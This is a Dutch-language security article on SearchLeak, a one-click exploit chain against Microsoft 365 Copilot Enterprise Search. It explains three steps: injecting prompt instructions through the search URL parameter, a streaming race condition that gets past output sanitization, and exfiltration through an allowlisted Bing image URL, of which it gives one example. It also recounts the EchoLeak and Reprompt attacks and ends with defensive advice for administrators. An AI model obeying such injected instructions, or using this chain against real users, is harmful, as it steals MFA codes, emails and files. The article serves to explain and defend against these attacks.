SearchLeak: De kwetsbaarheid die prompt-injectie en klassieke bugs aan elkaar knoopte tot een data-diefstalwapen

In juni 2026 onthulde Varonis Threat Labs een kwetsbaarheid die meer leest als een spionageroman dan een CVE-rapport. Met de codenaam SearchLeak kon een exploit-keten in Microsoft 365 Copilot Enterprise Search de meest gevoelige data van een gebruiker—e-mails, eenmalige MFA-codes, wachtwoord-resetlinks en geïndexeerde bestanden—buitmaken met niet meer dan een enkele klik op een legitieme microsoft.com-link . Geen wachtwoordformulier, geen tweede klik, geen expliciete prompt. De aanval was onzichtbaar voor anti-phishingfilters juist omdat deze zich op Microsofts eigen domein afspeelde .

De kwetsbaarheid kreeg van Microsoft het label CVE-2026-42824 met de classificatie "kritiek" en werd voordat misbruik bekend was server-side gepatcht. Klanten hoefden geen vinger uit te steken . Het echte verhaal is echter niet de patch, maar de ingenieuze drietrapsketen die de aanval mogelijk maakte en wat die onthult over de beveiliging van AI-gedreven bedrijfstools.

Waarom SearchLeak ertoe doet

SearchLeak was niet één catastrofale bug. Het was een keten van drie kleinere zwakke plekken, elk zorgvuldig in volgorde uitgebuit. Op zichzelf zou geen ervan een crisis zijn geweest. Samen vormden ze een stille, eenmalige exfiltratiepijplijn die overal bij kon waar de ingelogde gebruiker via Microsoft Graph-toegang toe had: e-mails, agenda-uitnodigingen, vergadernotities, SharePoint-documenten en OneDrive-bestanden .

Cruciaal was dat het een patroon onderstreepte waarvoor beveiligingsonderzoekers al waarschuwden. In januari 2026 onthulde hetzelfde lab van Varonis Reprompt, een vrijwel identieke aanval met één klik op de consumentenversie Copilot Personal . Nog eerder, in juni 2025, bracht Aim Security EchoLeak aan het licht, een zero-click-kwetsbaarheid die een prompt-injectie in een kwaadaardig document als wapen inzette . De komst van SearchLeak toonde aan dat beveiligingsmaatregelen op ondernemingsniveau de onderliggende risicoklasse niet hadden geëlimineerd—ze hadden de lat voor aanvallers alleen maar hoger gelegd om creatiever te zijn.

De drieledige bugketen

Elke schakel in de SearchLeak-keten is op zichzelf leerzaam, maar het is hun gecombineerde effect dat de aanval zo krachtig maakte.

Fase 1: Parameter-to-Prompt-Injectie

Copilot Enterprise Search accepteert een URL-parameter—q—die de natuurlijke-taalzoekopdracht van de gebruiker bevat. Onderzoekers van Varonis ontdekten dat de parameter niet alleen een zoekterm accepteerde, maar willekeurige prompt-instructies .

Een aanvaller kon een URL maken die, wanneer geladen door een geauthenticeerde gebruiker, Copilot opdracht gaf iets heel anders te doen dan wat de link leek te tonen. Een link kon de AI bijvoorbeeld vertellen om in de mailbox van het slachtoffer naar een eenmalige MFA-code te zoeken, die code in een afbeeldings-URL in te bedden en aan het antwoord toe te voegen. Het slachtoffer zag een normaal uitziende Microsoft-zoekpagina. Copilot gehoorzaamde in stilte de geïnjecteerde prompt .

Deze techniek, die Varonis Parameter-to-Prompt (P2P)-injectie noemt, was hetzelfde mechanisme dat aan de basis lag van de eerdere Reprompt-aanval op Copilot Personal .

Fase 2: Een raceconditie die de opschoning omzeilt

Wanneer Copilot uitvoer produceert die HTML-opmaak bevat (zoals een <img>-tag), moet een server-side opschoner de uitvoer in codeblokken verpakken zodat de browser het als onschadelijke tekst behandelt. Het probleem? Het verpakken gebeurt pas nadat de inhoud volledig is gegenereerd .

De browser begint echter met het weergeven van het antwoord terwijl het nog wordt binnengestreamd. Een door de aanvaller geïnjecteerde <img>-tag vuurt zijn verzoek dus af zodra het in de stream verschijnt—voordat de opschoner ook maar draait. Tegen de tijd dat het codeblok verschijnt, is de afbeeldings-URL al opgevraagd en hebben de in het pad gecodeerde gegevens de browser van het slachtoffer al verlaten .

Dit is een klassieke raceconditie die dodelijk wordt door de context van AI-gegenereerde inhoud. Een ouder verdedigingsmechanisme was niet herontworpen voor een wereld waarin de AI-uitvoer zelf door de aanvaller wordt bestuurd.

Fase 3: Exfiltratie via een door CSP toegestaan Bing-eindpunt

Zelfs met de eerste twee fasen op hun plaats was er een laatste wegversperring: het Content Security Policy (CSP) op Microsofts m365.cloud.microsoft-domein blokkeert afbeeldingen van willekeurige externe servers. Echter, *.bing.com staat op de toegestane lijst .

Met het Bing-eindpunt "Zoeken op afbeelding" kan een URL server-side worden opgehaald. Bij de SearchLeak-exploit voegde de aanvaller de gestolen data toe als onderdeel van het zoekpad naar de afbeelding (bijv.

https://www.bing.com/images/search?q=/Jouw_Veiligheids_Code_847291/img.png

De aanvaller hoefde alleen de logs van zijn eigen afbeeldingseindpunt in de gaten te houden, die de Bing-server was misleid om te raadplegen.

De bedrieglijke eenvoud van een enkele klik

De hele keten werd automatisch uitgevoerd. Een slachtoffer klikte op een link. Copilot doorzocht zijn eigen data. De uitvoer werd naar de browser gestreamd. Een <img>-tag vuurde. De Bing-server haalde de URL van de aanvaller op. De gegevens werden geëxfiltreerd. Dit alles gebeurde voordat de browser van de gebruiker klaar was met het weergeven van de pagina.

De aanval was moeilijk te detecteren omdat:

• De URL op een vertrouwd Microsoft-domein stond, waardoor URL-scanners en reputatiecontroles werden omzeild .
• Er geen authenticatiedialoog of tweede klik werd geactiveerd—de bestaande sessie van het slachtoffer werd gebruikt.
• Alle uitgaande verzoeken naar toegestane Microsoft-infrastructuur gingen.

De data die kon worden gestolen was niet theoretisch. Onderzoekers belichtten eenmalige MFA-codes en wachtwoord-resetlinks die minutenlang geldig blijven, samen met agendagegevens en gevoelige documenten die door Copilot waren geïndexeerd .

De ernst-puzzel: Kritiek, maar welke score?

CVE-2026-42824 leidde tot een kort debat over de ernstclassificaties. Microsoft gaf de kwetsbaarheid zijn hoogste interne ernstlabel—Kritiek—maar kende een CVSS v3.1-basisscore van 6.5 (Gemiddeld) toe. De redenering: de aanval vereiste gebruikersinteractie (de enkele klik), wat de score verminderde .

Sommige bronnen meldden een 7.5 (Hoog) score van de National Vulnerability Database (NVD) . In de praktijk constateerden meerdere beoordelingen, waaronder die van TNW, echter dat zowel het Microsoft CSAF-record als de NVD-vermelding een identieke 6.5-vector weerspiegelden . De perceptie van een hogere score kan afkomstig zijn van onafhankelijke analisten die met ruimere impactaannames rekenden, of van vroege berichtgeving die werd herhaald.

Los van het getal was de consensus duidelijk: een enkele klik kon de meest gevoelige gegevens van een organisatie blootleggen.

De Copilot-kwetsbaarhedenstamboom

SearchLeak verscheen niet in een vacuüm. Het voegde zich bij twee andere baanbrekende ontdekkingen op het gebied van AI-exfiltratie:

• EchoLeak (CVE-2025-32711) — Juni 2025. Een zero-click-kwetsbaarheid van Aim Security die gebruikmaakte van een prompt-injectie ingebed in een document dat Copilot automatisch verwerkte. Geen gebruikersinteractie vereist. CVSS 9.3 .
• Reprompt — Januari 2026. Varonis toonde aan dat de consumentenversie Copilot Personal kon worden gekaapt met dezelfde P2P-injectietechniek. Geen malware, geen plugin, alleen een geprepareerde URL .

De rode draad is prompt-injectie, een dreiging die de kerncapaciteit van AI—het opvolgen van instructies—verandert in een aanvalsoppervlak. Elke volgende kwetsbaarheid heeft aangetoond dat het patchen van één oppervlak (Consument vs. Onderneming) of het toevoegen van vangrails (documentverwerking vs. zoekopdrachten) de klasse niet elimineert; het verlegt alleen de creativiteit van aanvallers .

Wat tenantbeheerders nu moeten doen

SearchLeak zelf is gepatcht en vereist geen actie van klanten. Maar de techniek verdwijnt niet, en beveiligingsteams moeten de lessen operationaliseren.

Monitor Copilot Search-URL's. De q-parameter staat nog steeds bloot. Let op gecodeerde HTML, script-achtige ladingen of verdacht lange instructiestrings in Copilot Enterprise Search-URL's die door je proxylogs stromen .

Let op abnormale uitgaande verzoeken naar Bing-afbeeldingseindpunten. Een gebruiker die plotseling meerdere verzoeken genereert naar *.bing.com met ongebruikelijke zoekpaden voor afbeeldingen—vooral patronen die lijken op gecodeerde of geëxfiltreerde gegevens—moet alarmbellen doen rinkelen .

Beperk het geïndexeerde oppervlak van Copilot. Pas databeheer toe volgens het principe van minimale rechten. Beperk welke SharePoint-sites, OneDrive-mappen en mailboxen Copilot kan indexeren, zodat een toekomstige kwetsbaarheid niet gelijkstaat aan de diefstal van alles waar de gebruiker bij kan. Controleer en verminder regelmatig de Microsoft Graph-machtigingen van Copilot .

De onthulling van SearchLeak was geen verhaal over een enkele patch, maar een waarschuwing over het evoluerende kruispunt van prompt-injectie en klassieke webkwetsbaarheden. Terwijl organisaties AI-copilots adopteren met diepgaande toegang tot hun data, moeten beveiligingsmodellen die AI-uitvoer als vertrouwde inhoud behandelen, worden heroverwogen. De volgende keten zal niet dezelfde drie bugs gebruiken—maar zal vrijwel zeker hetzelfde patroon hergebruiken.